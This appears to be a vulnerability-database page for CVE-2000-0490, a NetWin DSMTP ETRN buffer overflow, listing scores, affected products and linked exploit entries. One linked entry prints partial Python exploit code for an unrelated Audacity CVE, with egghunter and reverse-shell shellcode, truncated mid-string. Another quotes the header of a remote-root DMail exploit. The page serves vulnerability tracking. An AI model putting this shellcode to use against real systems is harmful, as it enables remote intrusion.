CVE-2000-0490
published 2000-06-01CVE-2000-0490: Buffer overflow in the NetWin DSMTP 2.7q in the NetWin dmail package allows remote attackers to execute arbitrary commands via a long ETRN request.
PriorityP338critical10CVSS 2.0
AVNACLAuNCCICAC
EXPLOIT
EPSS
6.24%
92.7th percentile
Buffer overflow in the NetWin DSMTP 2.7q in the NetWin dmail package allows remote attackers to execute arbitrary commands via a long ETRN request.
Affected
6 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netwin | dmail | — | — |
| netwin | dmail | — | — |
| netwin | dmail | — | — |
| netwin | dmail | — | — |
| netwin | dmail | — | — |
| netwin | dmail | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
exploitdb·2009-08-24
CVE-2009-0490 Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter)
---
#!/usr/bin/env python
#
# Audacity
print " [+] Creating eviL .gro file..."
buff = ("\x44" * 174)
buff += ("\xEB\x08\x90\x90")
buff += ("\x22\x23\x17\x01")
buff += "\x90"* 4
buff += ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x57\x30\x30\x54" # this is the egg...
"\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")
buff += ("\xCC" * 1000);
buff += "W00TW00T"
# Reverse shellcode to 192.168.2.3 change as you see fit (2000 bytes for space)
buff += ("\x89\xe5\xd9\xc3\xd9\x75\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4
Exploit-DB
NetWin DMail 2.7/2.8 - ETRN Buffer Overflow
exploitdb·2000-06-01
CVE-2000-0490 NetWin DMail 2.7/2.8 - ETRN Buffer Overflow
NetWin DMail 2.7/2.8 - ETRN Buffer Overflow
---
// source: https://www.securityfocus.com/bid/1297/info
NetWin's DMail is an alternative mail-server solution for unix and NT servers. There is a buffer overflow vulnerability in the server daemon that could allow remote attackers to execute arbitrary commands as root or cause a denial of service. The overflow occurs when a large buffer is sent to argument the ETRN command: If over 260 characters are sent, the stack is corrupted and the mailserver will crash.
/*
Netwin DSMTP Server v2.7q remote-root exploit
[email protected] | [email protected]
writen just for fun : ) heh,
tested arch = x86/Linux mdk7.0
I will port this to Solaris & FreeBSD when I have time...
check http://gsu.linux.org.tr/~noir/ offsets for other Linux distros.
greet
No writeups or analysis indexed.
http://archives.neohapsis.com/archives/bugtraq/2000-05/0407.htmlhttp://netwinsite.com/dmail/security.htmhttp://www.securityfocus.com/bid/1297https://exchange.xforce.ibmcloud.com/vulnerabilities/4579http://archives.neohapsis.com/archives/bugtraq/2000-05/0407.htmlhttp://netwinsite.com/dmail/security.htmhttp://www.securityfocus.com/bid/1297https://exchange.xforce.ibmcloud.com/vulnerabilities/4579
2000-06-01
Published